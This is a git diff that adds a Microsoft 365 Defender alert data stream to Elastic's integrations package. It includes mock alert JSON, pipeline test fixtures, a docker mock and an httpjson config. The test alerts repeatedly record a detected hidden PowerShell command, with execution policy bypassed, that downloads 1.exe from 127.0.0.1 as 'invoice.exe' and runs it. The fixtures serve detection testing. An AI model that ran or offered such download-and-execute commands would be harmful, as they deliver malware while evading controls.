"https://security.microsoft.com/alerts/dab4728eea-b128-44e3-ac16-a21f73b5436b_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "incidentWebUrl": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "actorDisplayName": null, + "threatDisplayName": null, + "threatFamilyName": null, + "mitreTechniques": [ + "T1057", + "T1059.001" + ], + "createdDateTime": "2023-10-20T09:54:10.8560905Z", + "lastUpdateDateTime": "2023-10-20T09:54:11.4966667Z", + "resolvedDateTime": null, + "firstActivityDateTime": "2023-10-20T09:51:39.5154802Z", + "lastActivityDateTime": "2023-10-20T09:51:41.6475257Z", + "alertPolicyId": null, + "additionalData": null, + "comments": [], + "evidence": [ + { + "@odata.type": "#microsoft.graph.security.deviceEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [ + "PrimaryDevice" + ], + "tags": [], + "firstSeenDateTime": "2023-10-20T09:50:17.7383987Z", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "azureAdDeviceId": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "deviceDnsName": "clw555test", + "osPlatform": "Windows11", + "osBuild": 22621, + "version": "22H2", + "healthStatus": "inactive", + "riskScore": "high", + "rbacGroupId": 0, + "rbacGroupName": null, + "onboardingStatus": "onboarded", + "defenderAvStatus": "notSupported", + "ipInterfaces": [], + "vmMetadata": null, + "loggedOnUsers": [ + { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD" + } + ] + }, + { + "@odata.type": "#microsoft.graph.security.userEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "unknown", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 5772, + "parentProcessId": 7408, + "processCommandLine": "\"cmd.exe\" ", + "processCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "parentProcessCreationDateTime": "2023-10-20T09:34:32.0067951Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "13e9bb7e85ff9b08c26a440412e5cd5d296c4d35", + "sha256": "423e0e810a69aaceba0e5670e58aff898cf0ebffab99ccb46ebb3464c3d2facb", + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "explorer.exe", + "filePath": "C:\\Windows", + "fileSize": 5261576, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + }, + { + "@odata.type": "#microsoft.graph.security.processEvidence", + "createdDateTime": "2023-10-20T09:54:10.8833333Z", + "verdict": "suspicious", + "remediationStatus": "none", + "remediationStatusDetails": null, + "roles": [], + "detailedRoles": [], + "tags": [], + "processId": 8224, + "parentProcessId": 5772, + "processCommandLine": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "processCreationDateTime": "2023-10-20T09:51:39.4997961Z", + "parentProcessCreationDateTime": "2023-10-20T09:51:19.5064237Z", + "detectionStatus": "detected", + "mdeDeviceId": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "imageFile": { + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "fileName": "powershell.exe", + "filePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "fileSize": 491520, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "parentProcessImageFile": { + "sha1": null, + "sha256": null, + "fileName": "cmd.exe", + "filePath": "C:\\Windows\\System32", + "fileSize": 323584, + "filePublisher": "Microsoft Corporation", + "signer": null, + "issuer": null + }, + "userAccount": { + "accountName": "CDPUserIS-38411", + "domainName": "AzureAD", + "userSid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759", + "azureAdUserId": "588d7c15-8565-448e-bc2d-57f2b7c4c58a", + "userPrincipalName": "cdp.38411@crestdatasys.com", + "displayName": null + } + } + ] + } + ] + } diff --git a/packages/m365_defender/_dev/deploy/docker/docker-compose.yml b/packages/m365_defender/_dev/deploy/docker/docker-compose.yml index 6aca3ac3d0a..1a38b428f30 100644 --- a/packages/m365_defender/_dev/deploy/docker/docker-compose.yml +++ b/packages/m365_defender/_dev/deploy/docker/docker-compose.yml @@ -26,3 +26,16 @@ services: - --exit-on-unmatched-rule - --addr=:8080 - --config=/config.yml + m365-defender-alert-http: + image: docker.elastic.co/observability/stream:v0.13.0 + ports: + - 8080 + volumes: + - ./alert-http-mock-config.yml:/config.yml + environment: + PORT: 8080 + command: + - http-server + - --exit-on-unmatched-rule + - --addr=:8080 + - --config=/config.yml diff --git a/packages/m365_defender/changelog.yml b/packages/m365_defender/changelog.yml index 0dc27afd338..9d5e9d1e57e 100644 --- a/packages/m365_defender/changelog.yml +++ b/packages/m365_defender/changelog.yml @@ -1,4 +1,19 @@ # newer versions go on top +- version: "2.8.0" + changes: + - description: Set sensitive values as secret and fix incorrect mappings. + type: enhancement + link: https://github.com/elastic/integrations/pull/9127 +- version: "2.7.1" + changes: + - description: Handle invalid IP addresses. + type: bugfix + link: https://github.com/elastic/integrations/pull/9060 +- version: "2.7.0" + changes: + - description: Add support of Alert Data Stream. + type: enhancement + link: https://github.com/elastic/integrations/pull/8950 - version: "2.6.2" changes: - description: Fix cursor value and query building for log data stream. diff --git a/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log new file mode 100644 index 00000000000..f060082c795 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log @@ -0,0 +1 @@ +{"id":"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1","providerAlertId":"efa1828b-dd4e-405c-8a3b-aa28596830dd_1","incidentId":"23","status":"new","severity":"medium","classification":null,"determination":null,"serviceSource":"microsoftDefenderForEndpoint","detectionSource":"microsoftDefenderForEndpoint","productName":"Microsoft Defender for Endpoint","detectorId":"7f1c3609-a3ff-40e2-995b-c01770161d68","tenantId":"3adb963c-8e61-48e8-a06d-6dbb0dacea39","title":"Suspicious PowerShell command line","description":"A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.","recommendedActions":"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.","category":"Execution","assignedTo":null,"alertWebUrl":"https:\/\/security.microsoft.com\/alerts\/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39","incidentWebUrl":"https:\/\/security.microsoft.com\/incidents\/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39","actorDisplayName":null,"threatDisplayName":null,"threatFamilyName":null,"mitreTechniques":["T1059.001"],"createdDateTime":"2023-10-20T09:53:09.8839373Z","lastUpdateDateTime":"2023-10-20T09:54:07.5033333Z","resolvedDateTime":null,"firstActivityDateTime":"2023-10-20T09:51:39.5154802Z","lastActivityDateTime":"2023-10-20T09:51:41.9939003Z","alertPolicyId":null,"additionalData":null,"comments":[],"evidence":[{"@odata.type":"#microsoft.graph.security.deviceEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"unknown","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":["PrimaryDevice"],"tags":[],"firstSeenDateTime":"2023-10-20T09:50:17.7383987Z","mdeDeviceId":"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843","azureAdDeviceId":"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14","deviceDnsName":"clw555test","osPlatform":"Windows11","osBuild":22621,"version":"22H2","healthStatus":"inactive","riskScore":"high","rbacGroupId":0,"rbacGroupName":null,"onboardingStatus":"onboarded","defenderAvStatus":"notSupported","ipInterfaces":["192.168.5.65","fe80::cfe4:80b:615c:38fb","127.0.0.1","::1"],"vmMetadata":null,"loggedOnUsers":[{"accountName":"CDPUserIS-38411","domainName":"AzureAD"}]},{"@odata.type":"#microsoft.graph.security.userEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"unknown","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"userAccount":{"accountName":"CDPUserIS-38411","domainName":"AzureAD","userSid":"S-1-12-1-1485667349-1150190949-4065799612-2328216759","azureAdUserId":null,"userPrincipalName":null,"displayName":null}},{"@odata.type":"#microsoft.graph.security.urlEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"suspicious","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"url":"http:\/\/127.0.0.1\/1.exe"},{"@odata.type":"#microsoft.graph.security.ipEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"suspicious","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"ipAddress":"127.0.0.1","countryLetterCode":null},{"@odata.type":"#microsoft.graph.security.processEvidence","createdDateTime":"2023-10-20T09:53:10.1933333Z","verdict":"unknown","remediationStatus":"none","remediationStatusDetails":null,"roles":[],"detailedRoles":[],"tags":[],"processId":8224,"parentProcessId":5772,"processCommandLine":"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http:\/\/127.0.0.1\/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'","processCreationDateTime":"2023-10-20T09:51:39.4997961Z","parentProcessCreationDateTime":"2023-10-20T09:51:19.5064237Z","detectionStatus":"detected","mdeDeviceId":"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843","imageFile":{"sha1":"a72c41316307889e43fe8605a0dca4a72e72a011","sha256":"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80","fileName":"powershell.exe","filePath":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0","fileSize":491520,"filePublisher":"Microsoft Corporation","signer":null,"issuer":null},"parentProcessImageFile":{"sha1":null,"sha256":null,"fileName":"cmd.exe","filePath":"C:\\Windows\\System32","fileSize":323584,"filePublisher":"Microsoft Corporation","signer":null,"issuer":null},"userAccount":{"accountName":"CDPUserIS-38411","domainName":"AzureAD","userSid":"S-1-12-1-1485667349-1150190949-4065799612-2328216759","azureAdUserId":null,"userPrincipalName":null,"displayName":null}}]} diff --git a/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json new file mode 100644 index 00000000000..812c3928d5b --- /dev/null +++ b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-alert.log-expected.json @@ -0,0 +1,270 @@ +{ + "expected": [ + { + "@timestamp": "2023-10-20T09:54:07.503Z", + "cloud": { + "account": { + "id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39" + } + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": [ + "detected" + ], + "category": [ + "host", + "iam", + "network", + "process" + ], + "created": "2023-10-20T09:53:09.883Z", + "duration": 2478000000, + "end": "2023-10-20T09:51:41.993Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "kind": "alert", + "original": "{\"id\":\"daefa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"providerAlertId\":\"efa1828b-dd4e-405c-8a3b-aa28596830dd_1\",\"incidentId\":\"23\",\"status\":\"new\",\"severity\":\"medium\",\"classification\":null,\"determination\":null,\"serviceSource\":\"microsoftDefenderForEndpoint\",\"detectionSource\":\"microsoftDefenderForEndpoint\",\"productName\":\"Microsoft Defender for Endpoint\",\"detectorId\":\"7f1c3609-a3ff-40e2-995b-c01770161d68\",\"tenantId\":\"3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"title\":\"Suspicious PowerShell command line\",\"description\":\"A suspicious PowerShell activity was observed on the machine. \\nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.\",\"recommendedActions\":\"1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.\",\"category\":\"Execution\",\"assignedTo\":null,\"alertWebUrl\":\"https:\\/\\/security.microsoft.com\\/alerts\\/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"incidentWebUrl\":\"https:\\/\\/security.microsoft.com\\/incidents\\/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39\",\"actorDisplayName\":null,\"threatDisplayName\":null,\"threatFamilyName\":null,\"mitreTechniques\":[\"T1059.001\"],\"createdDateTime\":\"2023-10-20T09:53:09.8839373Z\",\"lastUpdateDateTime\":\"2023-10-20T09:54:07.5033333Z\",\"resolvedDateTime\":null,\"firstActivityDateTime\":\"2023-10-20T09:51:39.5154802Z\",\"lastActivityDateTime\":\"2023-10-20T09:51:41.9939003Z\",\"alertPolicyId\":null,\"additionalData\":null,\"comments\":[],\"evidence\":[{\"@odata.type\":\"#microsoft.graph.security.deviceEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"unknown\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[\"PrimaryDevice\"],\"tags\":[],\"firstSeenDateTime\":\"2023-10-20T09:50:17.7383987Z\",\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"azureAdDeviceId\":\"f18bd540-d5e4-46e0-8ddd-3d03a59e4e14\",\"deviceDnsName\":\"clw555test\",\"osPlatform\":\"Windows11\",\"osBuild\":22621,\"version\":\"22H2\",\"healthStatus\":\"inactive\",\"riskScore\":\"high\",\"rbacGroupId\":0,\"rbacGroupName\":null,\"onboardingStatus\":\"onboarded\",\"defenderAvStatus\":\"notSupported\",\"ipInterfaces\":[\"192.168.5.65\",\"fe80::cfe4:80b:615c:38fb\",\"127.0.0.1\",\"::1\"],\"vmMetadata\":null,\"loggedOnUsers\":[{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\"}]},{\"@odata.type\":\"#microsoft.graph.security.userEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"unknown\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\",\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\",\"azureAdUserId\":null,\"userPrincipalName\":null,\"displayName\":null}},{\"@odata.type\":\"#microsoft.graph.security.urlEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"suspicious\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"url\":\"http:\\/\\/127.0.0.1\\/1.exe\"},{\"@odata.type\":\"#microsoft.graph.security.ipEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"suspicious\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"ipAddress\":\"127.0.0.1\",\"countryLetterCode\":null},{\"@odata.type\":\"#microsoft.graph.security.processEvidence\",\"createdDateTime\":\"2023-10-20T09:53:10.1933333Z\",\"verdict\":\"unknown\",\"remediationStatus\":\"none\",\"remediationStatusDetails\":null,\"roles\":[],\"detailedRoles\":[],\"tags\":[],\"processId\":8224,\"parentProcessId\":5772,\"processCommandLine\":\"powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http:\\/\\/127.0.0.1\\/1.exe', 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe');Start-Process 'C:\\\\\\\\test-WDATP-test\\\\\\\\invoice.exe'\",\"processCreationDateTime\":\"2023-10-20T09:51:39.4997961Z\",\"parentProcessCreationDateTime\":\"2023-10-20T09:51:19.5064237Z\",\"detectionStatus\":\"detected\",\"mdeDeviceId\":\"505d70d89cfa3428f7aac7d2eb3a64c60fd3d843\",\"imageFile\":{\"sha1\":\"a72c41316307889e43fe8605a0dca4a72e72a011\",\"sha256\":\"d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80\",\"fileName\":\"powershell.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"fileSize\":491520,\"filePublisher\":\"Microsoft Corporation\",\"signer\":null,\"issuer\":null},\"parentProcessImageFile\":{\"sha1\":null,\"sha256\":null,\"fileName\":\"cmd.exe\",\"filePath\":\"C:\\\\Windows\\\\System32\",\"fileSize\":323584,\"filePublisher\":\"Microsoft Corporation\",\"signer\":null,\"issuer\":null},\"userAccount\":{\"accountName\":\"CDPUserIS-38411\",\"domainName\":\"AzureAD\",\"userSid\":\"S-1-12-1-1485667349-1150190949-4065799612-2328216759\",\"azureAdUserId\":null,\"userPrincipalName\":null,\"displayName\":null}}]}", + "provider": "microsoftDefenderForEndpoint", + "severity": 3, + "start": "2023-10-20T09:51:39.515Z", + "type": [ + "info" + ], + "url": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39" + }, + "host": { + "id": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843" + ], + "ip": [ + "127.0.0.1" + ], + "os": { + "name": [ + "Windows11" + ], + "version": [ + "22H2" + ] + } + }, + "m365_defender": { + "alert": { + "category": "Execution", + "created_datetime": "2023-10-20T09:53:09.883Z", + "description": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "detection_source": "microsoftDefenderForEndpoint", + "detector_id": "7f1c3609-a3ff-40e2-995b-c01770161d68", + "evidence": [ + { + "azure_ad_device_id": "f18bd540-d5e4-46e0-8ddd-3d03a59e4e14", + "created_datetime": "2023-10-20T09:53:10.193Z", + "defender_av_status": "notSupported", + "detailed_roles": [ + "PrimaryDevice" + ], + "device_dns_name": "clw555test", + "first_seen_datetime": "2023-10-20T09:50:17.738Z", + "health_status": "inactive", + "ip_interfaces": [ + "192.168.5.65", + "fe80::cfe4:80b:615c:38fb", + "127.0.0.1", + "::1" + ], + "logged_on_users": [ + { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD" + } + ], + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.deviceEvidence", + "onboarding_status": "onboarded", + "os_build": "22621", + "os_platform": "Windows11", + "rbac_group": { + "id": "0" + }, + "remediation_status": "none", + "risk_score": "high", + "verdict": "unknown", + "version": "22H2" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.userEvidence", + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "odata_type": "#microsoft.graph.security.urlEvidence", + "remediation_status": "none", + "url": "http://127.0.0.1/1.exe", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "ip_address": "127.0.0.1", + "odata_type": "#microsoft.graph.security.ipEvidence", + "remediation_status": "none", + "verdict": "suspicious" + }, + { + "created_datetime": "2023-10-20T09:53:10.193Z", + "detection_status": "detected", + "image_file": { + "name": "powershell.exe", + "path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0", + "publisher": "Microsoft Corporation", + "sha1": "a72c41316307889e43fe8605a0dca4a72e72a011", + "sha256": "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80", + "size": 491520 + }, + "mde_device_id": "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "odata_type": "#microsoft.graph.security.processEvidence", + "parent_process": { + "creation_datetime": "2023-10-20T09:51:19.506Z", + "id": 5772, + "image_file": { + "name": "cmd.exe", + "path": "C:\\Windows\\System32", + "publisher": "Microsoft Corporation", + "size": 323584 + } + }, + "process": { + "command_line": "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'", + "creation_datetime": "2023-10-20T09:51:39.499Z", + "id": 8224 + }, + "remediation_status": "none", + "user_account": { + "account_name": "CDPUserIS-38411", + "domain_name": "AzureAD", + "user_sid": "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + }, + "verdict": "unknown" + } + ], + "first_activity_datetime": "2023-10-20T09:51:39.515Z", + "id": "daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "incident_id": "23", + "incident_web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/incidents/23?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/incidents/23", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + }, + "last_activity_datetime": "2023-10-20T09:51:41.993Z", + "last_update_datetime": "2023-10-20T09:54:07.503Z", + "mitre_techniques": [ + "T1059.001" + ], + "provider_alert_id": "efa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "recommended_actions": "1. Examine the PowerShell command line to understand what commands were executed. Note: the content may need to be decoded if it is Base64-encoded.\n2. Search the script for more indicators to investigate - for example IP addresses (potential C&C servers), target computers etc.\n3. Explore the timeline of this and other related machines for additional suspect activities around the time of the alert.\n4. Look for the process that invoked this PowerShell run and their origin. Consider submitting any suspect files in the chain for deep analysis for detailed behavior information.", + "service_source": "microsoftDefenderForEndpoint", + "severity": "medium", + "status": "new", + "tenant_id": "3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "title": "Suspicious PowerShell command line", + "web_url": { + "domain": "security.microsoft.com", + "original": "https://security.microsoft.com/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1?tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "path": "/alerts/daefa1828b-dd4e-405c-8a3b-aa28596830dd_1", + "query": "tid=3adb963c-8e61-48e8-a06d-6dbb0dacea39", + "scheme": "https" + } + } + }, + "message": "A suspicious PowerShell activity was observed on the machine. \nThis behavior may indicate that PowerShell was used during installation, exploration, or in some cases in lateral movement activities which are used by attackers to invoke modules, download external payloads, or get more information about the system. Attackers usually use PowerShell to bypass security protection mechanisms by executing their payload in memory without touching the disk and leaving any trace.", + "process": { + "command_line": [ + "powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference= 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\\\test-WDATP-test\\\\invoice.exe');Start-Process 'C:\\\\test-WDATP-test\\\\invoice.exe'" + ], + "hash": { + "sha1": [ + "a72c41316307889e43fe8605a0dca4a72e72a011" + ], + "sha256": [ + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ] + }, + "parent": { + "pid": [ + 5772 + ], + "start": [ + "2023-10-20T09:51:19.506Z" + ] + }, + "pid": [ + 8224 + ], + "start": [ + "2023-10-20T09:51:39.499Z" + ], + "user": { + "name": [ + "CDPUserIS-38411" + ] + } + }, + "related": { + "hash": [ + "a72c41316307889e43fe8605a0dca4a72e72a011", + "d783ba6567faf10fdff2d0ea3864f6756862d6c733c7f4467283da81aedc3a80" + ], + "hosts": [ + "505d70d89cfa3428f7aac7d2eb3a64c60fd3d843", + "Windows11", + "22H2", + "clw555test", + "AzureAD" + ], + "ip": [ + "127.0.0.1" + ], + "user": [ + "CDPUserIS-38411", + "S-1-12-1-1485667349-1150190949-4065799612-2328216759" + ] + }, + "tags": [ + "preserve_original_event", + "preserve_duplicate_custom_fields" + ], + "threat": { + "tactic": { + "name": [ + "Execution" + ] + }, + "technique": { + "subtechnique": { + "id": [ + "T1059.001" + ] + } + } + }, + "user": { + "domain": [ + "AzureAD" + ], + "name": [ + "CDPUserIS-38411" + ] + } + } + ] +} \ No newline at end of file diff --git a/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-common-config.yml b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-common-config.yml new file mode 100644 index 00000000000..be41bb0d476 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/_dev/test/pipeline/test-common-config.yml @@ -0,0 +1,4 @@ +fields: + tags: + - preserve_original_event + - preserve_duplicate_custom_fields diff --git a/packages/m365_defender/data_stream/alert/_dev/test/system/test-default-config.yml b/packages/m365_defender/data_stream/alert/_dev/test/system/test-default-config.yml new file mode 100644 index 00000000000..0cca3f53c76 --- /dev/null +++ b/packages/m365_defender/data_stream/alert/_dev/test/system/test-default-config.yml @@ -0,0 +1,15 @@ +input: httpjson +service: m365-defender-alert-http +vars: + login_url: http://{{Hostname}}:{{Port}} + client_id: xxxx + client_secret: xxxx + tenant_id: tenant_id +data_stream: + vars: + request_url: http://{{Hostname}}:{{Port}} + preserve_original_event: true + preserve_duplicate_custom_fields: true + batch_size: 2 +assert: + hit_count: 3 diff --git a/packages/m365_defender/data_stream/alert/agent/stream/httpjson.yml.hbs b/packages/m365_defender/data_stream/alert/agent/stream/httpjson.yml.hbs new file mode 100644 index 00000000000..3c18301e8fd --- /dev/null +++ b/packages/m365_defender/data_stream/alert/agent/stream/httpjson.yml.hbs @@ -0,0 +1,65 @@ +config_version: 2 +interval: {{interval}} +{{#if enable_request_tracer}} +request.tracer.filename: "../../logs/httpjson/http-request-trace-*.ndjson" +request.tracer.maxbackups: 5 +{{/if}} +auth.oauth2.client.id: {{client_id}} +auth.oauth2.client.secret: {{client_secret}} +auth.oauth2.token_url: {{login_url}}/{{tenant_id}}/oauth2/v2.0/token +auth.oauth2.scopes: {{request_url}}/.default +request.url: {{request_url}}/v1.0/security/alerts_v2 +{{#if http_client_timeout}} +request.timeout: {{http_client_timeout}} +{{/if}} +{{#if proxy_url}} +request.proxy_url: {{proxy_url}} +{{/if}} +{{#if ssl}} +request.ssl: {{ssl}} +{{/if}} +request.transforms: + - set: + target: url.params.$top + value: {{batch_size}} + - set: + target: url.params.$skip + value: 0 + - set: + target: url.params.$filter + value: 'lastUpdateDateTime ge [[.cursor.last_update_time]]' + default: 'lastUpdateDateTime ge [[formatDate (now (parseDuration "-{{initial_interval}}"))]]' + - set: + target: url.params.$orderby + value: 'lastUpdateDateTime asc' +response.pagination: + - set: + target: url.params.$filter + value: '[[.last_response.url.params.Get "$filter"]]' + fail_on_template_error: true + - set: + target: url.params.$skip + value: '[[if (eq (len .last_response.body.value) {{batch_size}})]][[add (toInt (.last_response.url.params.Get "$skip")) {{batch_size}}]][[end]]' + fail_on_template_error: true +response.split: + target: body.value +cursor: + last_update_time: + value: '[[.last_event.lastUpdateDateTime]]' +tags: +{{#if preserve_original_event}} + - preserve_original_event +{{/if}} +{{#if preserve_duplicate_custom_fields}} + 